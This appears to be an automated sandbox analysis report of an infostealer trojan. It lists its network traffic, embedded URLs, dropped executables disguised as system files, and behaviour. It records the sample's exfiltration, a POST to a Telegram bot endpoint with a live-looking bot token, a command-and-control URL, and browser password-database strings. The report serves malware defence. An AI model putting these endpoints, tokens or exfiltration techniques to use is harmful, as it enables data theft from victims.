                                    Source: unknownHTTP traffic detected: POST /bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhoto HTTP/1.1Content-Type: multipart/form-data; boundary="df078fe5-ba23-4170-8bea-85b5048774e2"Host: api.telegram.orgContent-Length: 86411Expect: 100-continueConnection: Keep-Alive
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.reP
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002903000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru/
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.00000000027A8000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002CE5000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000286E000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.00000000029E4000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002B3D000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002903000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://250345cm.renyash.ru/sqltemp.php
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
                                    Source: fontdrvhost.exe, 0000001A.00000002.2897795682.000000000084A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.mic
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.0000000003825000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ipinfo.io
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.carterandcone.coml
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
                                    Source: fontdrvhost.exe, 0000001A.00000002.2927835879.000000001E7C2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
                                    Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755252738.0000000002F52000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmp, bsCLGWVU.log.26.dr, knlJjCXV.log.4.drString found in binary or memory: https://api.telegram.org/bot
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.00000000038A3000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002788000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot8143016568:AAEvmfltzzwYHiQ7qyRFPs1EAB_RQhZk4kg/sendPhotoX
                                    Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                                    Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                                    Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                                    Source: 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                                    Source: 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                                    Source: 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.000000000380B000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755507962.0000000003849000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ipinfo.io
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.0000000003805000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755252738.0000000002F52000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, bsCLGWVU.log.26.dr, knlJjCXV.log.4.drString found in binary or memory: https://ipinfo.io/country
                                    Source: fontdrvhost.exe, 00000004.00000002.1755507962.0000000003805000.00000004.00000800.00020000.00000000.sdmp, fontdrvhost.exe, 00000004.00000002.1755252738.0000000002F52000.00000002.00000001.01000000.00000000.sdmp, fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, bsCLGWVU.log.26.dr, knlJjCXV.log.4.drString found in binary or memory: https://ipinfo.io/ip
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://support.mozilla.org
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefox
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.zvXrErQ5GYDF
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, doH1J2y0cr.26.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016
                                    Source: doH1J2y0cr.26.drString found in binary or memory: https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.000000000259D000.00000004.00000800.00020000.00000000.sdmp, doH1J2y0cr.26.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17
                                    Source: doH1J2y0cr.26.drString found in binary or memory: https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install
                                    Source: fontdrvhost.exe, 0000001A.00000002.2915469171.0000000012461000.00000004.00000800.00020000.00000000.sdmp, 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://www.ecosia.org/newtab/
                                    Source: 3iMMnB0sfI.26.dr, J8M2vhPRwT.26.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://www.mozilla.org
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.VsJpOAWrHqB2
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.n0g9CLHwD9nR
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
                                    Source: fontdrvhost.exe, 0000001A.00000002.2900490513.0000000002469000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/privacy/firefox/
                                    Source: dhpSrMBRff.26.drString found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
                                    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49730 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49732 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 34.117.59.81:443 -> 192.168.2.4:49744 version: TLS 1.2
                                    Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49753 version: TLS 1.2
                                    Source: C:\Drivers\fontdrvhost.exeWindow created: window name: CLIPBRDWNDCLASS

                                    System Summary

                                    barindex
                                    Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FA6FAA: __EH_prolog,_wcslen,_wcslen,CreateFileW,CloseHandle,CreateDirectoryW,CreateFileW,DeviceIoControl,CloseHandle,GetLastError,RemoveDirectoryW,DeleteFileW,0_2_00FA6FAA
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Windows\Downloaded Program Files\f8dafbcfe7f5f1Jump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FA848E0_2_00FA848E
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FA40FE0_2_00FA40FE
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FB00B70_2_00FB00B7
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FB40880_2_00FB4088
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FC51C90_2_00FC51C9
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FB71530_2_00FB7153
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FA32F70_2_00FA32F7
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FB62CA0_2_00FB62CA
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FB43BF0_2_00FB43BF
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FAF4610_2_00FAF461
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FCD4400_2_00FCD440
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FAC4260_2_00FAC426
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FB77EF0_2_00FB77EF
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FCD8EE0_2_00FCD8EE
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FA286B0_2_00FA286B
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FD19F40_2_00FD19F4
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FAE9B70_2_00FAE9B7
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FB6CDC0_2_00FB6CDC
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FB3E0B0_2_00FB3E0B
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FAEFE20_2_00FAEFE2
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FC4F9A0_2_00FC4F9A
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9B880D484_2_00007FFD9B880D48
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9B880E434_2_00007FFD9B880E43
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 4_2_00007FFD9BC7946A4_2_00007FFD9BC7946A
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B8B0B5523_2_00007FFD9B8B0B55
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B880D4823_2_00007FFD9B880D48
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 23_2_00007FFD9B880E4323_2_00007FFD9B880E43
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 24_2_00007FFD9B8B0D4824_2_00007FFD9B8B0D48
                                    Source: C:\Recovery\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 24_2_00007FFD9B8B0E4324_2_00007FFD9B8B0E43
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B8C0B5525_2_00007FFD9B8C0B55
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B8CCA0F25_2_00007FFD9B8CCA0F
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B8A094725_2_00007FFD9B8A0947
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B890D4825_2_00007FFD9B890D48
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 25_2_00007FFD9B890E4325_2_00007FFD9B890E43
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9B8A0D4826_2_00007FFD9B8A0D48
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9B8A0E4326_2_00007FFD9B8A0E43
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9B96318C26_2_00007FFD9B96318C
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9BC9944F26_2_00007FFD9BC9944F
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9BDC3DA926_2_00007FFD9BDC3DA9
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9BDC918526_2_00007FFD9BDC9185
                                    Source: C:\Drivers\fontdrvhost.exeCode function: 26_2_00007FFD9BDC4C8A26_2_00007FFD9BDC4C8A
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 35_2_00007FFD9B880D4835_2_00007FFD9B880D48
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 35_2_00007FFD9B880E4335_2_00007FFD9B880E43
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeCode function: 35_2_00007FFD9B8B0B5535_2_00007FFD9B8B0B55
                                    Source: Joe Sandbox ViewDropped File: C:\Users\user\Desktop\BimGJlFQ.log AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: String function: 00FBEB78 appears 39 times
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: String function: 00FBF5F0 appears 31 times
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: String function: 00FBEC50 appears 56 times
                                    Source: YGk3y6Tdix.exe, 00000000.00000003.1648168800.0000000000C52000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs YGk3y6Tdix.exe
                                    Source: YGk3y6Tdix.exe, 00000000.00000003.1648076766.0000000000C21000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs YGk3y6Tdix.exe
                                    Source: YGk3y6Tdix.exe, 00000000.00000003.1647906191.0000000000C56000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs YGk3y6Tdix.exe
                                    Source: YGk3y6Tdix.exe, 00000000.00000002.1649526523.0000000000C53000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe.mui` vs YGk3y6Tdix.exe
                                    Source: YGk3y6Tdix.exeBinary or memory string: OriginalFilenameSpotifyStartupTask.exe$ vs YGk3y6Tdix.exe
                                    Source: YGk3y6Tdix.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                    Source: fontdrvhost.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe0.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe1.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: FDhouUKjYnvlBIdtOklvQSsmeAjQ.exe2.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: services.exe.4.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@40/50@4/3
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FA6C74 GetLastError,FormatMessageW,0_2_00FA6C74
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCode function: 0_2_00FBA6C2 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_00FBA6C2
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Program Files\Internet Explorer\SIGNUP\services.exeJump to behavior
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\Desktop\jqKBOCJa.logJump to behavior
                                    Source: C:\Windows\Downloaded Program Files\FDhouUKjYnvlBIdtOklvQSsmeAjQ.exeMutant created: NULL
                                    Source: C:\Drivers\fontdrvhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\fontdrvhost
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7232:120:WilError_03
                                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1700:120:WilError_03
                                    Source: C:\Drivers\fontdrvhost.exeFile created: C:\Users\user\AppData\Local\Temp\t6yFe3K859Jump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Drivers\QSdmXzK8rClLDrHgb.bat" "
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCommand line argument: sfxname0_2_00FBDF1E
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCommand line argument: sfxstime0_2_00FBDF1E
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeCommand line argument: STARTDLG0_2_00FBDF1E
                                    Source: YGk3y6Tdix.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    Source: YGk3y6Tdix.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Drivers\fontdrvhost.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeFile read: C:\Windows\win.iniJump to behavior
                                    Source: C:\Users\user\Desktop\YGk3y6Tdix.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                                    Source: BPOjh9hPL9.26.dr, tApNpX5ile.26.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                                    Source: YGk3y6Tdix.exeVirustotal: Detection: 59%
                                    Source: YGk3y6Tdix.exeReversingLabs: Detection: 63%
